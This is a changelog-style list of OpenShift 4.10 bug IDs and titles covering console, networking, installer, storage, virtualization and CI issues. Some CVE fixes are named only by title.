2015515 - Kubelet checks all providers even if one is configured: NoCredentialProviders: no valid providers in chain
\n2015535 - Administration - ResourceQuotas - ResourceQuota details: Inside Pie chart \u0027x% used\u0027 is in English\n2015549 - Observe - Metrics: Column heading and pagination text is in English\n2015557 - Workloads - DeploymentConfigs : Error message is in English\n2015568 - Compute - Nodes : CPU column\u0027s values are in English\n2015635 - Storage operator fails causing installation to fail on ASH\n2015660 - \"Finishing boot source customization\" screen should not use term \"patched\"\n2015793 - [hypershift] The collect-profiles job\u0027s pods should run on the control-plane node\n2015806 - Metrics view in Deployment reports \"Forbidden\" when not cluster-admin\n2015819 - Conmon sandbox processes run on non-reserved CPUs with workload partitioning\n2015837 - OS_CLOUD overwrites install-config\u0027s platform.openstack.cloud\n2015950 - update from 4.7.22 to 4.8.11 is failing due to large amount of secrets to watch\n2015952 - RH CodeReady Workspaces Operator in e2e testing will soon fail\n2016004 - [RFE] RHCOS: help determining whether a user-provided image was already booted (Ignition provisioning already performed)\n2016008 - [4.10] Bootimage bump tracker\n2016052 - No e2e CI presubmit configured for release component azure-file-csi-driver\n2016053 - No e2e CI presubmit configured for release component azure-file-csi-driver-operator\n2016054 - No e2e CI presubmit configured for release component cluster-autoscaler\n2016055 - No e2e CI presubmit configured for release component console\n2016058 - openshift-sync does not synchronise in \"ose-jenkins:v4.8\"\n2016064 - No e2e CI presubmit configured for release component ibm-cloud-controller-manager\n2016065 - No e2e CI presubmit configured for release component ibmcloud-machine-controllers\n2016175 - Pods get stuck in ContainerCreating state when attaching volumes fails on SNO clusters. 
\n2016179 - Add Sprint 208 translations\n2016228 - Collect Profiles pprof secret is hardcoded to openshift-operator-lifecycle-manager\n2016235 - should update to 7.5.11 for grafana resources version label\n2016296 - Openshift virtualization : Create Windows Server 2019 VM using template : Fails\n2016334 - shiftstack: SRIOV nic reported as not supported\n2016352 - Some pods start before CA resources are present\n2016367 - Empty task box is getting created for a pipeline without finally task\n2016435 - Duplicate AlertmanagerClusterFailedToSendAlerts alerts\n2016438 - Feature flag gating is missing in few extensions contributed via knative plugin\n2016442 - OCPonRHV: pvc should be in Bound state and without error when choosing default sc\n2016446 - [OVN-Kubernetes] Egress Networkpolicy is failing Intermittently for statefulsets\n2016453 - Complete i18n for GaugeChart defaults\n2016479 - iface-id-ver is not getting updated for existing lsp\n2016925 - Dashboards with All filter, change to a specific value and change back to All, data will disappear\n2016951 - dynamic actions list is not disabling \"open console\" for stopped vms\n2016955 - m5.large instance type for bootstrap node is hardcoded causing deployments to fail if instance type is not available\n2016988 - NTO does not set io_timeout and max_retries for AWS Nitro instances\n2017016 - [REF] Virtualization menu\n2017036 - [sig-network-edge][Feature:Idling] Unidling should handle many TCP connections fails in periodic-ci-openshift-release-master-ci-4.9-e2e-openstack-ovn\n2017050 - Dynamic Plugins: Shared modules loaded multiple times, breaking use of PatternFly\n2017130 - t is not a function error navigating to details page\n2017141 - Project dropdown has a dynamic inline width added which can cause min-width issue\n2017244 - ovirt csi operator static files creation is in the wrong order\n2017276 - [4.10] Volume mounts not created with the correct security context\n2017327 - When run opm index prune failed with 
error removing operator package cic-operator FOREIGN KEY constraint failed. \n2017427 - NTO does not restart TuneD daemon when profile application is taking too long\n2017535 - Broken Argo CD link image on GitOps Details Page\n2017547 - Siteconfig application sync fails with The AgentClusterInstall is invalid: spec.provisionRequirements.controlPlaneAgents: Required value when updating images references\n2017564 - On-prem prepender dispatcher script overwrites DNS search settings\n2017565 - CCMO does not handle additionalTrustBundle on Azure Stack\n2017566 - MetalLB: Web Console -Create Address pool form shows address pool name twice\n2017606 - [e2e][automation] add test to verify send key for VNC console\n2017650 - [OVN]EgressFirewall cannot be applied correctly if cluster has windows nodes\n2017656 - VM IP address is \"undefined\" under VM details -\u003e ssh field\n2017663 - SSH password authentication is disabled when public key is not supplied\n2017680 - [gcp] Couldn\u2019t enable support for instances with GPUs on GCP\n2017732 - [KMS] Prevent creation of encryption enabled storageclass without KMS connection set\n2017752 - (release-4.10) obfuscate identity provider attributes in collected authentication.operator.openshift.io resource\n2017756 - overlaySize setting on containerruntimeconfig is ignored due to cri-o defaults\n2017761 - [e2e][automation] dummy bug for 4.9 test dependency\n2017872 - Add Sprint 209 translations\n2017874 - The installer is incorrectly checking the quota for X instances instead of G and VT instances\n2017879 - Add Chinese translation for \"alternate\"\n2017882 - multus: add handling of pod UIDs passed from runtime\n2017909 - [ICNI 2.0] ovnkube-masters stop processing add/del events for pods\n2018042 - HorizontalPodAutoscaler CPU averageValue did not show up in HPA metrics GUI\n2018093 - Managed cluster should ensure control plane pods do not run in best-effort QoS\n2018094 - the tooltip length is limited\n2018152 - CNI pod is not 
restarted when It cannot start servers due to ports being used\n2018208 - e2e-metal-ipi-ovn-ipv6 are failing 75% of the time\n2018234 - user settings are saved in local storage instead of on cluster\n2018264 - Delete Export button doesn\u0027t work in topology sidebar (general issue with unknown CSV?)\n2018272 - Deployment managed by link and topology sidebar links to invalid resource page (at least for Exports)\n2018275 - Topology graph doesn\u0027t show context menu for Export CSV\n2018279 - Edit and Delete confirmation modals for managed resource should close when the managed resource is clicked\n2018380 - Migrate docs links to access.redhat.com\n2018413 - Error: context deadline exceeded, OCP 4.8.9\n2018428 - PVC is deleted along with VM even with \"Delete Disks\" unchecked\n2018445 - [e2e][automation] enhance tests for downstream\n2018446 - [e2e][automation] move tests to different level\n2018449 - [e2e][automation] add test about create/delete network attachment definition\n2018490 - [4.10] Image provisioning fails with file name too long\n2018495 - Fix typo in internationalization README\n2018542 - Kernel upgrade does not reconcile DaemonSet\n2018880 - Get \u0027No datapoints found.\u0027 when query metrics about alert rule KubeCPUQuotaOvercommit and KubeMemoryQuotaOvercommit\n2018884 - QE - Adapt crw-basic feature file to OCP 4.9/4.10 changes\n2018935 - go.sum not updated, that ART extracts version string from, WAS: Missing backport from 4.9 for Kube bump PR#950\n2018965 - e2e-metal-ipi-upgrade is permafailing in 4.10\n2018985 - The rootdisk size is 15Gi of windows VM in customize wizard\n2019001 - AWS: Operator degraded (CredentialsFailing): 1 of 6 credentials requests are failing to sync. 
\n2019096 - Update SRO leader election timeout to support SNO\n2019129 - SRO in operator hub points to wrong repo for README\n2019181 - Performance profile does not apply\n2019198 - ptp offset metrics are not named according to the log output\n2019219 - [IBMCLOUD]: cloud-provider-ibm missing IAM permissions in CCCMO CredentialRequest\n2019284 - Stop action should not in the action list while VMI is not running\n2019346 - zombie processes accumulation and Argument list too long\n2019360 - [RFE] Virtualization Overview page\n2019452 - Logger object in LSO appends to existing logger recursively\n2019591 - Operator install modal body that scrolls has incorrect padding causing shadow position to be incorrect\n2019634 - Pause and migration is enabled in action list for a user who has view only permission\n2019636 - Actions in VM tabs should be disabled when user has view only permission\n2019639 - \"Take snapshot\" should be disabled while VM image is still been importing\n2019645 - Create button is not removed on \"Virtual Machines\" page for view only user\n2019646 - Permission error should pop-up immediately while clicking \"Create VM\" button on template page for view only user\n2019647 - \"Remove favorite\" and \"Create new Template\" should be disabled in template action list for view only user\n2019717 - cant delete VM with un-owned pvc attached\n2019722 - The shared-resource-csi-driver-node pod runs as \u201cBestEffort\u201d qosClass\n2019739 - The shared-resource-csi-driver-node uses imagePullPolicy as \"Always\"\n2019744 - [RFE] Suggest users to download newest RHEL 8 version\n2019809 - [OVN][Upgrade] After upgrade to 4.7.34 ovnkube-master pods are in CrashLoopBackOff/ContainerCreating and other multiple issues at OVS/OVN level\n2019827 - Display issue with top-level menu items running demo plugin\n2019832 - 4.10 Nightlies blocked: Failed to upgrade authentication, operator was degraded\n2019886 - Kuryr unable to finish ports recovery upon controller 
restart\n2019948 - [RFE] Restructring Virtualization links\n2019972 - The Nodes section doesn\u0027t display the csr of the nodes that are trying to join the cluster\n2019977 - Installer doesn\u0027t validate region causing binary to hang with a 60 minute timeout\n2019986 - Dynamic demo plugin fails to build\n2019992 - instance:node_memory_utilisation:ratio metric is incorrect\n2020001 - Update dockerfile for demo dynamic plugin to reflect dir change\n2020003 - MCD does not regard \"dangling\" symlinks as a files, attempts to write through them on next backup, resulting in \"not writing through dangling symlink\" error and degradation. \n2020107 - cluster-version-operator: remove runlevel from CVO namespace\n2020153 - Creation of Windows high performance VM fails\n2020216 - installer: Azure storage container blob where is stored bootstrap.ign file shouldn\u0027t be public\n2020250 - Replacing deprecated ioutil\n2020257 - Dynamic plugin with multiple webpack compilation passes may fail to build\n2020275 - ClusterOperators link in console returns blank page during upgrades\n2020377 - permissions error while using tcpdump option with must-gather\n2020489 - coredns_dns metrics don\u0027t include the custom zone metrics data due to CoreDNS prometheus plugin is not defined\n2020498 - \"Show PromQL\" button is disabled\n2020625 - [AUTH-52] User fails to login from web console with keycloak OpenID IDP after enable group membership sync feature\n2020638 - [4.7] CI conformance test failures related to CustomResourcePublishOpenAPI\n2020664 - DOWN subports are not cleaned up\n2020904 - When trying to create a connection from the Developer view between VMs, it fails\n2021016 - \u0027Prometheus Stats\u0027 of dashboard \u0027Prometheus Overview\u0027 miss data on console compared with Grafana\n2021017 - 404 page not found error on knative eventing page\n2021031 - QE - Fix the topology CI scripts\n2021048 - [RFE] Added MAC Spoof check\n2021053 - Metallb operator presented as 
community operator\n2021067 - Extensive number of requests from storage version operator in cluster\n2021081 - Missing PolicyGenTemplate for configuring Local Storage Operator LocalVolumes\n2021135 - [azure-file-csi-driver] \"make unit-test\" returns non-zero code, but tests pass\n2021141 - Cluster should allow a fast rollout of kube-apiserver is failing on single node\n2021151 - Sometimes the DU node does not get the performance profile configuration applied and MachineConfigPool stays stuck in Updating\n2021152 - imagePullPolicy is \"Always\" for ptp operator images\n2021191 - Project admins should be able to list available network attachment defintions\n2021205 - Invalid URL in git import form causes validation to not happen on URL change\n2021322 - cluster-api-provider-azure should populate purchase plan information\n2021337 - Dynamic Plugins: ResourceLink doesn\u0027t render when passed a groupVersionKind\n2021364 - Installer requires invalid AWS permission s3:GetBucketReplication\n2021400 - Bump documentationBaseURL to 4.10\n2021405 - [e2e][automation] VM creation wizard Cloud Init editor\n2021433 - \"[sig-builds][Feature:Builds][pullsearch] docker build where the registry is not specified\" test fail permanently on disconnected\n2021466 - [e2e][automation] Windows guest tool mount\n2021544 - OCP 4.6.44 - Ingress VIP assigned as secondary IP in ovs-if-br-ex and added to resolv.conf as nameserver\n2021551 - Build is not recognizing the USER group from an s2i image\n2021607 - Unable to run openshift-install with a vcenter hostname that begins with a numeric character\n2021629 - api request counts for current hour are incorrect\n2021632 - [UI] Clicking on odf-operator breadcrumb from StorageCluster details page displays empty page\n2021693 - Modals assigned modal-lg class are no longer the correct width\n2021724 - Observe \u003e Dashboards: Graph lines are not visible when obscured by other lines\n2021731 - CCO occasionally down, reporting 
networksecurity.googleapis.com API as disabled\n2021936 - Kubelet version in RPMs should be using Dockerfile label instead of git tags\n2022050 - [BM][IPI] Failed during bootstrap - unable to read client-key /var/lib/kubelet/pki/kubelet-client-current.pem\n2022053 - dpdk application with vhost-net is not able to start\n2022114 - Console logging every proxy request\n2022144 - 1 of 3 ovnkube-master pods stuck in clbo after ipi bm deployment - dualstack (Intermittent)\n2022251 - wait interval in case of a failed upload due to 403 is unnecessarily long\n2022399 - MON_DISK_LOW troubleshooting guide link when clicked, gives 404 error . \n2022447 - ServiceAccount in manifests conflicts with OLM\n2022502 - Patternfly tables with a checkbox column are not displaying correctly because of conflicting css rules. \n2022509 - getOverrideForManifest does not check manifest.GVK.Group\n2022536 - WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache\n2022612 - no namespace field for \"Kubernetes / Compute Resources / Namespace (Pods)\" admin console dashboard\n2022627 - Machine object not picking up external FIP added to an openstack vm\n2022646 - configure-ovs.sh failure - Error: unknown connection \u0027WARN:\u0027\n2022707 - Observe / monitoring dashboard shows forbidden errors on Dev Sandbox\n2022801 - Add Sprint 210 translations\n2022811 - Fix kubelet log rotation file handle leak\n2022812 - [SCALE] ovn-kube service controller executes unnecessary load balancer operations\n2022824 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests\n2022880 - Pipeline renders with minor visual artifact with certain task dependencies\n2022886 - Incorrect URL in operator description\n2023042 - CRI-O filters custom runtime allowed annotation when both custom workload and custom runtime sections specified under the config\n2023060 - [e2e][automation] Windows VM with CDROM migration\n2023077 - [e2e][automation] Home 
Overview Virtualization status\n2023090 - [e2e][automation] Examples of Import URL for VM templates\n2023102 - [e2e][automation] Cloudinit disk of VM from custom template\n2023216 - ACL for a deleted egressfirewall still present on node join switch\n2023228 - Remove Tech preview badge on Trigger components 1.6 OSP on OCP 4.9\n2023238 - [sig-devex][Feature:ImageEcosystem][python][Slow] hot deploy for openshift python image Django example should work with hot deploy\n2023342 - SCC admission should take ephemeralContainers into account\n2023356 - Devfiles can\u0027t be loaded in Safari on macOS (403 - Forbidden)\n2023434 - Update Azure Machine Spec API to accept Marketplace Images\n2023500 - Latency experienced while waiting for volumes to attach to node\n2023522 - can\u0027t remove package from index: database is locked\n2023560 - \"Network Attachment Definitions\" has no project field on the top in the list view\n2023592 - [e2e][automation] add mac spoof check for nad\n2023604 - ACL violation when deleting a provisioning-configuration resource\n2023607 - console returns blank page when normal user without any projects visit Installed Operators page\n2023638 - Downgrade support level for extended control plane integration to Dev Preview\n2023657 - inconsistent behaviours of adding ssh key on rhel node between 4.9 and 4.10\n2023675 - Changing CNV Namespace\n2023779 - Fix Patch 104847 in 4.9\n2023781 - initial hardware devices is not loading in wizard\n2023832 - CCO updates lastTransitionTime for non-Status changes\n2023839 - Bump recommended FCOS to 34.20211031.3.0\n2023865 - Console css overrides prevent dynamic plug-in PatternFly tables from displaying correctly\n2023950 - make test-e2e-operator on kubernetes-nmstate results in failure to pull image from \"registry:5000\" repository\n2023985 - [4.10] OVN idle service cannot be accessed after upgrade from 4.8\n2024055 - External DNS added extra prefix for the TXT record\n2024108 - Occasionally node remains in 
SchedulingDisabled state even after update has been completed sucessfully\n2024190 - e2e-metal UPI is permafailing with inability to find rhcos.json\n2024199 - 400 Bad Request error for some queries for the non admin user\n2024220 - Cluster monitoring checkbox flickers when installing Operator in all-namespace mode\n2024262 - Sample catalog is not displayed when one API call to the backend fails\n2024309 - cluster-etcd-operator: defrag controller needs to provide proper observability\n2024316 - modal about support displays wrong annotation\n2024328 - [oVirt / RHV] PV disks are lost when machine deleted while node is disconnected\n2024399 - Extra space is in the translated text of \"Add/Remove alternate service\" on Create Route page\n2024448 - When ssh_authorized_keys is empty in form view it should not appear in yaml view\n2024493 - Observe \u003e Alerting \u003e Alerting rules page throws error trying to destructure undefined\n2024515 - test-blocker: Ceph-storage-plugin tests failing\n2024535 - hotplug disk missing OwnerReference\n2024537 - WINDOWS_IMAGE_LINK does not refer to windows cloud image\n2024547 - Detail page is breaking for namespace store , backing store and bucket class. 
\n2024551 - KMS resources not getting created for IBM FlashSystem storage\n2024586 - Special Resource Operator(SRO) - Empty image in BuildConfig when using RT kernel\n2024613 - pod-identity-webhook starts without tls\n2024617 - vSphere CSI tests constantly failing with Rollout of the monitoring stack failed and is degraded\n2024665 - Bindable services are not shown on topology\n2024731 - linuxptp container: unnecessary checking of interfaces\n2024750 - i18n some remaining OLM items\n2024804 - gcp-pd-csi-driver does not use trusted-ca-bundle when cluster proxy configured\n2024826 - [RHOS/IPI] Masters are not joining a clusters when installing on OpenStack\n2024841 - test Keycloak with latest tag\n2024859 - Not able to deploy an existing image from private image registry using developer console\n2024880 - Egress IP breaks when network policies are applied\n2024900 - Operator upgrade kube-apiserver\n2024932 - console throws \"Unauthorized\" error after logging out\n2024933 - openshift-sync plugin does not sync existing secrets/configMaps on start up\n2025093 - Installer does not honour diskformat specified in storage policy and defaults to zeroedthick\n2025230 - ClusterAutoscalerUnschedulablePods should not be a warning\n2025266 - CreateResource route has exact prop which need to be removed\n2025301 - [e2e][automation] VM actions availability in different VM states\n2025304 - overwrite storage section of the DV spec instead of the pvc section\n2025431 - [RFE]Provide specific windows source link\n2025458 - [IPI-AWS] cluster-baremetal-operator pod in a crashloop state after patching from 4.7.21 to 4.7.36\n2025464 - [aws] openshift-install gather bootstrap collects logs for bootstrap and only one master node\n2025467 - [OVN-K][ETP=local] Host to service backed by ovn pods doesn\u0027t work for ExternalTrafficPolicy=local\n2025481 - Update VM Snapshots UI\n2025488 - [DOCS] Update the doc for nmstate operator installation\n2025592 - ODC 4.9 supports invalid devfiles 
only\n2025765 - It should not try to load from storageProfile after unchecking\"Apply optimized StorageProfile settings\"\n2025767 - VMs orphaned during machineset scaleup\n2025770 - [e2e] non-priv seems looking for v2v-vmware configMap in ns \"kubevirt-hyperconverged\" while using customize wizard\n2025788 - [IPI on azure]Pre-check on IPI Azure, should check VM Size\u2019s vCPUsAvailable instead of vCPUs for the sku. \n2025821 - Make \"Network Attachment Definitions\" available to regular user\n2025823 - The console nav bar ignores plugin separator in existing sections\n2025830 - CentOS capitalizaion is wrong\n2025837 - Warn users that the RHEL URL expire\n2025884 - External CCM deploys openstack-cloud-controller-manager from quay.io/openshift/origin-*\n2025903 - [UI] RoleBindings tab doesn\u0027t show correct rolebindings\n2026104 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2026178 - OpenShift Alerting Rules Style-Guide Compliance\n2026209 - Updation of task is getting failed (tekton hub integration)\n2026223 - Internal error occurred: failed calling webhook \"ptpconfigvalidationwebhook.openshift.io\"\n2026321 - [UPI on Azure] Shall we remove allowedValue about VMSize in ARM templates\n2026343 - [upgrade from 4.5 to 4.6] .status.connectionState.address of catsrc community-operators is not correct\n2026352 - Kube-Scheduler revision-pruner fail during install of new cluster\n2026374 - aws-pod-identity-webhook go.mod version out of sync with build environment\n2026383 - Error when rendering custom Grafana dashboard through ConfigMap\n2026387 - node tuning operator metrics endpoint serving old certificates after certificate rotation\n2026396 - Cachito Issues: sriov-network-operator Image build failure\n2026488 - openshift-controller-manager - delete event is repeating pathologically\n2026489 - ThanosRuleRuleEvaluationLatencyHigh alerts when a big quantity 
of alerts defined. \n2026560 - Cluster-version operator does not remove unrecognized volume mounts\n2026699 - fixed a bug with missing metadata\n2026813 - add Mellanox CX-6 Lx DeviceID 101f NIC support in SR-IOV Operator\n2026898 - Description/details are missing for Local Storage Operator\n2027132 - Use the specific icon for Fedora and CentOS template\n2027238 - \"Node Exporter / USE Method / Cluster\" CPU utilization graph shows incorrect legend\n2027272 - KubeMemoryOvercommit alert should be human readable\n2027281 - [Azure] External-DNS cannot find the private DNS zone in the resource group\n2027288 - Devfile samples can\u0027t be loaded after fixing it on Safari (redirect caching issue)\n2027299 - The status of checkbox component is not revealed correctly in code\n2027311 - K8s watch hooks do not work when fetching core resources\n2027342 - Alert ClusterVersionOperatorDown is firing on OpenShift Container Platform after ca certificate rotation\n2027363 - The azure-file-csi-driver and azure-file-csi-driver-operator don\u0027t use the downstream images\n2027387 - [IBMCLOUD] Terraform ibmcloud-provider buffers entirely the qcow2 image causing spikes of 5GB of RAM during installation\n2027498 - [IBMCloud] SG Name character length limitation\n2027501 - [4.10] Bootimage bump tracker\n2027524 - Delete Application doesn\u0027t delete Channels or Brokers\n2027563 - e2e/add-flow-ci.feature fix accessibility violations\n2027585 - CVO crashes when changing spec.upstream to a cincinnati graph which includes invalid conditional edges\n2027629 - Gather ValidatingWebhookConfiguration and MutatingWebhookConfiguration resource definitions\n2027685 - openshift-cluster-csi-drivers pods crashing on PSI\n2027745 - default samplesRegistry prevents the creation of imagestreams when registrySources.allowedRegistries is enforced\n2027824 - ovnkube-master CrashLoopBackoff: panic: Expected slice or struct but got string\n2027917 - No settings in hostfirmwaresettings and schema objects 
for masters
2027927 - sandbox creation fails due to obsolete option in /etc/containers/storage.conf
2027982 - nncp stucked at ConfigurationProgressing
2028019 - Max pending serving CSRs allowed in cluster machine approver is not right for UPI clusters
2028024 - After deleting a SpecialResource, the node is still tagged although the driver is removed
2028030 - Panic detected in cluster-image-registry-operator pod
2028042 - Desktop viewer for Windows VM shows "no Service for the RDP (Remote Desktop Protocol) can be found"
2028054 - Cloud controller manager operator can't get leader lease when upgrading from 4.8 up to 4.9
2028106 - [RFE] Use dynamic plugin actions for kubevirt plugin
2028141 - Console tests doesn't pass on Node.js 15 and 16
2028160 - Remove i18nKey in network-policy-peer-selectors.tsx
2028162 - Add Sprint 210 translations
2028170 - Remove leading and trailing whitespace
2028174 - Add Sprint 210 part 2 translations
2028187 - Console build doesn't pass on Node.js 16 because node-sass doesn't support it
2028217 - Cluster-version operator does not default Deployment replicas to one
2028240 - Multiple CatalogSources causing higher CPU use than necessary
2028268 - Password parameters are listed in FirmwareSchema in spite that cannot and shouldn't be set in HostFirmwareSettings
2028325 - disableDrain should be set automatically on SNO
2028484 - AWS EBS CSI driver's livenessprobe does not respect operator's loglevel
2028531 - Missing netFilter to the list of parameters when platform is OpenStack
2028610 - Installer doesn't retry on GCP rate limiting
2028685 - LSO repeatedly reports errors while diskmaker-discovery pod is starting
2028695 - destroy cluster does not prune bootstrap instance profile
2028731 - The containerruntimeconfig controller has wrong assumption regarding the number of containerruntimeconfigs
2028802 - CRI-O panic due to invalid memory address or nil pointer dereference
2028816 - VLAN IDs not released on failures
2028881 - Override not working for the PerformanceProfile template
2028885 - Console should show an error context if it logs an error object
2028949 - Masthead dropdown item hover text color is incorrect
2028963 - Whereabouts should reconcile stranded IP addresses
2029034 - enabling ExternalCloudProvider leads to inoperative cluster
2029178 - Create VM with wizard - page is not displayed
2029181 - Missing CR from PGT
2029273 - wizard is not able to use if project field is "All Projects"
2029369 - Cypress tests github rate limit errors
2029371 - patch pipeline--worker nodes unexpectedly reboot during scale out
2029394 - missing empty text for hardware devices at wizard review
2029414 - Alibaba Disk snapshots with XFS filesystem cannot be used
2029416 - Alibaba Disk CSI driver does not use credentials provided by CCO / ccoctl
2029521 - EFS CSI driver cannot delete volumes under load
2029570 - Azure Stack Hub: CSI Driver does not use user-ca-bundle
2029579 - Clicking on an Application which has a Helm Release in it causes an error
2029644 - New resource FirmwareSchema - reset_required exists for Dell machines and doesn't for HPE
2029645 - Sync upstream 1.15.0 downstream
2029671 - VM action "pause" and "clone" should be disabled while VM disk is still being importing
2029742 - [ovn] Stale lr-policy-list and snat rules left for egressip
2029750 - cvo keep restart due to it fail to get feature gate value during the initial start stage
2029785 - CVO panic when an edge is included in both edges and conditionaledges
2029843 - Downstream ztp-site-generate-rhel8 4.10 container image missing content(/home/ztp)
2030003 - HFS CRD: Attempt to set Integer parameter to not-numeric string value - no error
2030029 - [4.10][goroutine]Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace
2030228 - Fix StorageSpec resources field to use correct API
2030229 - Mirroring status card reflect wrong data
2030240 - Hide overview page for non-privileged user
2030305 - Export App job do not completes
2030347 - kube-state-metrics exposes metrics about resource annotations
2030364 - Shared resource CSI driver monitoring is not setup correctly
2030488 - Numerous Azure CI jobs are Failing with Partially Rendered machinesets
2030534 - Node selector/tolerations rules are evaluated too early
2030539 - Prometheus is not highly available
2030556 - Don't display Description or Message fields for alerting rules if those annotations are missing
2030568 - Operator installation fails to parse operatorframework.io/initialization-resource annotation
2030574 - console service uses older "service.alpha.openshift.io" for the service serving certificates.
2030677 - BOND CNI: There is no option to configure MTU on a Bond interface
2030692 - NPE in PipelineJobListener.upsertWorkflowJob
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2030847 - PerformanceProfile API version should be v2
2030961 - Customizing the OAuth server URL does not apply to upgraded cluster
2031006 - Application name input field is not autofocused when user selects "Create application"
2031012 - Services of type loadbalancer do not work if the traffic reaches the node from an interface different from br-ex
2031040 - Error screen when open topology sidebar for a Serverless / knative service which couldn't be started
2031049 - [vsphere upi] pod machine-config-operator cannot be started due to panic issue
2031057 - Topology sidebar for Knative services shows a small pod ring with "0 undefined" as tooltip
2031060 - Failing CSR Unit test due to expired test certificate
2031085 - ovs-vswitchd running more threads than expected
2031141 - Some pods not able to reach k8s api svc IP 198.223.0.1
2031228 - CVE-2021-43813 grafana: directory traversal vulnerability
2031502 - [RFE] New common templates crash the ui
2031685 - Duplicated forward upstreams should be removed from the dns operator
2031699 - The displayed ipv6 address of a dns upstream should be case sensitive
2031797 - [RFE] Order and text of Boot source type input are wrong
2031826 - CI tests needed to confirm driver-toolkit image contents
2031831 - OCP Console - Global CSS overrides affecting dynamic plugins
2031839 - Starting from Go 1.17 invalid certificates will render a cluster dysfunctional
2031858 - GCP beta-level Role (was: CCO occasionally down, reporting networksecurity.googleapis.com API as disabled)
2031875 - [RFE]: Provide online documentation for the SRO CRD (via oc explain)
2031926 - [ipv6dualstack] After SVC conversion from single stack only to RequireDualStack, cannot curl NodePort from the node itself
2032006 - openshift-gitops-application-controller-0 failed to schedule with sufficient node allocatable resource
2032111 - arm64 cluster, create project and deploy the example deployment, pod is CrashLoopBackOff due to the image is built on linux+amd64
2032141 - open the alertrule link in new tab, got empty page
2032179 - [PROXY] external dns pod cannot reach to cloud API in the cluster behind a proxy
2032296 - Cannot create machine with ephemeral disk on Azure
2032407 - UI will show the default openshift template wizard for HANA template
2032415 - Templates page - remove "support level" badge and add "support level" column which should not be hard coded
2032421 - [RFE] UI integration with automatic updated images
2032516 - Not able to import git repo with .devfile.yaml
2032521 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the aws_vpc_dhcp_options_association resource
2032547 - hardware devices table have filter when table is empty
2032565 - Deploying compressed files with a MachineConfig resource degrades the MachineConfigPool
2032566 - Cluster-ingress-router does not support Azure Stack
2032573 - Adopting enforces deploy_kernel/ramdisk which does not work with deploy_iso
2032589 - DeploymentConfigs ignore resolve-names annotation
2032732 - Fix styling conflicts due to recent console-wide CSS changes
2032831 - Knative Services and Revisions are not shown when Service has no ownerReference
2032851 - Networking is "not available" in Virtualization Overview
2032926 - Machine API components should use K8s 1.23 dependencies
2032994 - AddressPool IP is not allocated to service external IP wtih aggregationLength 24
2032998 - Can not achieve 250 pods/node with OVNKubernetes in a multiple worker node cluster
2033013 - Project dropdown in user preferences page is broken
2033044 - Unable to change import strategy if devfile is invalid
2033098 - Conjunction in ProgressiveListFooter.tsx is not translatable
2033111 - IBM VPC operator library bump removed global CLI args
2033138 - "No model registered for Templates" shows on customize wizard
2033215 - Flaky CI: crud/other-routes.spec.ts fails sometimes with an cypress ace/a11y AssertionError: 1 accessibility violation was detected
2033239 - [IPI on Alibabacloud] 'openshift-install' gets the wrong region ('cn-hangzhou') selected
2033257 - unable to use configmap for helm charts
2033271 - [IPI on Alibabacloud] destroying cluster succeeded, but the resource group deletion wasn't triggered
2033290 - Product builds for console are failing
2033382 - MAPO is missing machine annotations
2033391 - csi-driver-shared-resource-operator sets unused CVO-manifest annotations
2033403 - Devfile catalog does not show provider information
2033404 - Cloud event schema is missing source type and resource field is using wrong value
2033407 - Secure route data is not pre-filled in edit flow form
2033422 - CNO not allowing LGW conversion from SGW in runtime
2033434 - Offer darwin/arm64 oc in clidownloads
2033489 - CCM operator failing on baremetal platform
2033518 - [aws-efs-csi-driver]Should not accept invalid FSType in sc for AWS EFS driver
2033524 - [IPI on Alibabacloud] interactive installer cannot list existing base domains
2033536 - [IPI on Alibabacloud] bootstrap complains invalid value for alibabaCloud.resourceGroupID when updating "cluster-infrastructure-02-config.yml" status, which leads to bootstrap failed and all master nodes NotReady
2033538 - Gather Cost Management Metrics Custom Resource
2033579 - SRO cannot update the special-resource-lifecycle ConfigMap if the data field is undefined
2033587 - Flaky CI test project-dashboard.scenario.ts: Resource Quotas Card was not found on project detail page
2033634 - list-style-type: disc is applied to the modal dropdowns
2033720 - Update samples in 4.10
2033728 - Bump OVS to 2.16.0-33
2033729 - remove runtime request timeout restriction for azure
2033745 - Cluster-version operator makes upstream update service / Cincinnati requests more frequently than intended
2033749 - Azure Stack Terraform fails without Local Provider
2033750 - Local volume should pull multi-arch image for kube-rbac-proxy
2033751 - Bump kubernetes to 1.23
2033752 - make verify fails due to missing yaml-patch
2033784 - set kube-apiserver degraded=true if webhook matches a virtual resource
2034004 - [e2e][automation] add tests for VM snapshot improvements
2034068 - [e2e][automation] Enhance tests for 4.10 downstream
2034087 - [OVN] EgressIP was assigned to the node which is not egress node anymore
2034097 - [OVN] After edit EgressIP object, the status is not correct
2034102 - [OVN] Recreate the deleted EgressIP object got InvalidEgressIP warning
2034129 - blank page returned when clicking 'Get started' button
2034144 - [OVN AWS] ovn-kube egress IP monitoring cannot detect the failure on ovn-k8s-mp0
2034153 - CNO does not verify MTU migration for OpenShiftSDN
2034155 - [OVN-K] [Multiple External Gateways] Per pod SNAT is disabled
2034170 - Use function.knative.dev for Knative Functions related labels
2034190 - unable to add new VirtIO disks to VMs
2034192 - Prometheus fails to insert reporting metrics when the sample limit is met
2034243 - regular user cant load template list
2034245 - installing a cluster on aws, gcp always fails with "Error: Incompatible provider version"
2034248 - GPU/Host device modal is too small
2034257 - regular user `Create VM` missing permissions alert
2034285 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]
2034287 - do not block upgrades if we can't create storageclass in 4.10 in vsphere
2034300 - Du validator policy is NonCompliant after DU configuration completed
2034319 - Negation constraint is not validating packages
2034322 - CNO doesn't pick up settings required when ExternalControlPlane topology
2034350 - The CNO should implement the Whereabouts IP reconciliation cron job
2034362 - update description of disk interface
2034398 - The Whereabouts IPPools CRD should include the podref field
2034409 - Default CatalogSources should be pointing to 4.10 index images
2034410 - Metallb BGP, BFD: prometheus is not scraping the frr metrics
2034413 - cloud-network-config-controller fails to init with secret "cloud-credentials" not found in manual credential mode
2034460 - Summary: cloud-network-config-controller does not account for different environment
